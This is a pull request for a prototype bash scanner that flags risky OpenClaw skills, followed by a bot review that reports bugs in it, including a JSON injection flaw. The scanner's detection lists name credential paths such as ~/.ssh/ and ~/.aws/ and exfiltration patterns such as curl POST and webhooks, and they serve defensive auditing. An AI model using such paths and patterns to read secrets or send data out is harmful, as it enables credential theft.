#20266: feat: skills-audit — Phase 1 security scanner for installed skills

## Summary Prototype implementation of `skills-audit`, the Phase 1 security scanner proposed in [RFC #10890](https://github.com/openclaw/openclaw/issues/10890). This is a standalone bash script that scans all installed OpenClaw skills and flags security risks. It's designed to be the foundation for a future `openclaw skills audit` CLI command. ## What it scans | Check | Description | |-------|-------------| | **Tool references** | Flags skills that reference `exec`, `browser`, `web_fetch`, `gateway`, `nodes`, `cron`, `message` in SKILL.md | | **Executables** | Detects `.sh`, `.py`, `.js`, `.rb`, `.go` files in skill directories | | **Sensitive paths** | Checks for references to `~/.ssh/`, `~/.aws/`, credentials, tokens, private keys | | **Exfiltration patterns** | Scans executables for `curl POST`, `requests.post`, `webhook`, `base64 encode`, etc. | | **Permission manifest** | Checks for `permissions.json`, `permissions.yaml`, or `skill.json` | | **Integrity hashes** | Computes SHA-256 of each SKILL.md for tamper detection | ## Risk classification | Level | Criteria | |-------|----------| | 🔴 **High** | `exec` + network tool combo, or exfiltration patterns found | | 🟡 **Medium** | Uses `exec`, or references sensitive paths | | 🔵 **Low** | Contains executables but no other flags | | 🟢 **Clean** | No executables, no risky tools, no sensitive path access | ## Usage ```bash # Scan default skill locations ./scripts/security/skills-audit.sh # Verbose (detailed findings per skill) ./scripts/security/skills-audit.sh -v # JSON output (for CI/automation) ./scripts/security/skills-audit.sh -j ``` ## Test results Ran against a real OpenClaw 2026.2.15 installation (51 bundled + 1 workspace skill): - 🟡 3 medium-risk skills flagged (coding-agent, tmux, 1p3a-sweep) - 🟢 49 clean skills - 📋 **0 out of 52 skills have a permission manifest** — confirming the RFC's urgency - 📦 0 exfiltration patterns detected in bundled skills (good!) ## Next steps This PR is the first building block. Follow-up work: 1. **Permission manifest JSON Schema** — so skills can declare what they need (Phase 1.2 of the RFC) 2. **Hash persistence** — store hashes on install, compare on audit to detect tampering (Phase 1.3) 3. **CLI integration** — wire this into `openclaw skills audit` as a first-class command 4. **Runtime enforcement** — [SkillSandbox](https://github.com/theMachineClay/skillsandbox) implements Phase 3 (capability-based runtime isolation with seccomp-bpf, iptables, filesystem scoping, MCP integration) 5. **Session-aware policy** — [AgentTrace](https://github.com/theMachineClay/agenttrace) adds stateful violation tracking for Phase 3 anomaly detection Happy to iterate on feedback. The goal is to make the skill ecosystem trustworthy enough to grow safely. Refs: #10890, #7827, #12565, #10827 Co-Authored-By: Ivy Fei <ivy.d.fei@gmail.com> <!-- greptile_comment --> <h3>Greptile Summary</h3> Adds a standalone bash script (`scripts/security/skills-audit.sh`) that scans installed OpenClaw skills for security risks (dangerous tool references, executables, sensitive paths, exfiltration patterns) and classifies them by risk level. This is a Phase 1 prototype for RFC #10890. - The table header output is broken: `echo -e` is used with `printf`-style format specifiers (`%-8s`) which it doesn't interpret, resulting in literal format strings in the output - JSON output mode has an injection vulnerability: `$skill_name` is interpolated directly into a heredoc JSON template without escaping — skill names containing `"` or `\` will produce invalid/injected JSON - The "no permission manifest" footer summary uses wrong logic — it checks if any non-clean skills exist but reports **all** skills as missing manifests - The sensitive path patterns (`token`, `secret`, `password`, `credentials`) will produce high false-positive rates when scanning SKILL.md documentation files, since these words appear legitimately in 23+ skill docs across the repo <h3>Confidence Score: 2/5</h3> - This PR has multiple functional bugs that need fixing before merge — broken output formatting, JSON injection, and incorrect summary logic. - Score reflects three distinct bugs (broken echo/printf header, JSON injection in output mode, wrong manifest count logic) plus a design issue with false-positive-prone patterns. The script is a standalone addition so risk to existing code is low, but it won't work correctly as-is. - `scripts/security/skills-audit.sh` — all issues are in this file _{Last reviewed commit: beff8e6} <!-- greptile_other_comments_section --> _{(2/5) Greptile learns from your feedback when you react with thumbs up/down!} <!-- /greptile_comment -->